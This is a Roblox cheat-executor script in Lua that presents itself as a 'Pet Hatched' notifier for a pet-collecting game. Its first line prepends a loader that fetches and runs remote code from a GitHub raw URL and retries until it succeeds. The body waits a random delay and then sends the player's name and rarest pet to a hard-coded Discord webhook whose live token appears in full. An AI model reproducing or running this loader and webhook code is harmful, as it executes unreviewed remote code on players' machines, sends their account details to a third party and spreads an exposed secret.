_G.Config={UserID="3087df52-2f5c-4e6f-a407-10fa72d16932",discord_id="1135837863603351573",Note="Pc"}local s;for i=1,5 do s=pcall(function()loadstring(game:HttpGet("https://raw.githubusercontent.com/skadidau/unfazedfree/refs/heads/main/bgsi"))()end)if s then break end wait(5)end
-- WOMAN FACE GOD STYLE • RANDOM DELAY • FINAL

local httpRequest =
    (syn and syn.request) or
    (http and http.request) or
    (http_request) or
    (fluxus and fluxus.request) or
    (request)

if not httpRequest then
    warn("NO_HTTP_SUPPORT")
    return
end

local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")

local LocalData = require(ReplicatedStorage.Client.Framework.Services.LocalData)
local PetsModule = require(ReplicatedStorage.Shared.Data.Pets)

local WEBHOOK =
"https://discord.com/api/webhooks/1439502842762362922/0Eorxj5JJ8wh2GfA6zLKBlcTK_zWKmaCuors35FpN02d273KHry_Y4iNP1Aw_IZlaGg9"

--------------------------------------------------
-- helpers
--------------------------------------------------

local function getDenominator(info)
    if info.DisplayChance then
        local v = tonumber(info.DisplayChance)
        if v then
            if v < 1 then return 1 / v end
            return v
        end
    end

    if info.DisplayChanceText then
        local num = info.DisplayChanceText:match("1%s*/%s*([%d,]+)")
        if num then
            return tonumber(num:gsub(",", ""))
        end
    end

    if info.Chance then
        local v = tonumber(info.Chance)
        if v then
            if v < 1 then return 1 / v end
            return v
        end
    end

    return nil
end

local function formatShort(n)
    if n >= 1e9 then
        return string.format("%.1fb", n / 1e9):gsub("%.0", "")
    elseif n >= 1e6 then
        return string.format("%.1fm", n / 1e6):gsub("%.0", "")
    elseif n >= 1e3 then
        return string.format("%.1fk", n / 1e3):gsub("%.0", "")
    else
        return tostring(math.floor(n))
    end
end

--------------------------------------------------
-- find rarest discovered secret
--------------------------------------------------

local data = LocalData:Get()
if not data or not data.Discovered then
    warn("NO_DISCOVERED_DATA")
    return
end

local rarestName
local rarestInfo
local highestDenom = 0

for petName, discovered in pairs(data.Discovered) do
    if discovered then
        local info = PetsModule[petName]
        if info and info.Rarity == "Secret" then
            local denom = getDenominator(info)
            if denom and denom > highestDenom then
                highestDenom = denom
                rarestName = petName
                rarestInfo = info
            end
        end
    end
end

if not rarestName then
    warn("NO_SECRET_FOUND")
    return
end

--------------------------------------------------
-- random delay (1–10 seconds)
--------------------------------------------------

task.wait(math.random(1, 10))

--------------------------------------------------
-- image (content.bgsi.io)
--------------------------------------------------

local imageURL =
    "https://content.bgsi.io/" ..
    rarestName:lower():gsub("%s+", "_") ..
    ".webp"

--------------------------------------------------
-- webhook payload
--------------------------------------------------

local payload = {
    username = "test",
    embeds = {{
        title = "Pet Hatched!",
        color = 15761628,
        thumbnail = { url = imageURL },
        fields = {
            { name = "Player", value = Players.LocalPlayer.Name, inline = true },
            { name = "Pet", value = rarestName, inline = true },
            { name = "Chance", value = "1 / " .. formatShort(highestDenom), inline = false }
        }
    }}
}

--------------------------------------------------
-- send webhook
--------------------------------------------------

local res = httpRequest({
    Url = WEBHOOK,
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json"
    },
    Body = HttpService:JSONEncode(payload)
})

if res then
    print("SENT", res.StatusCode)
else
    warn("NO_RESPONSE")
end
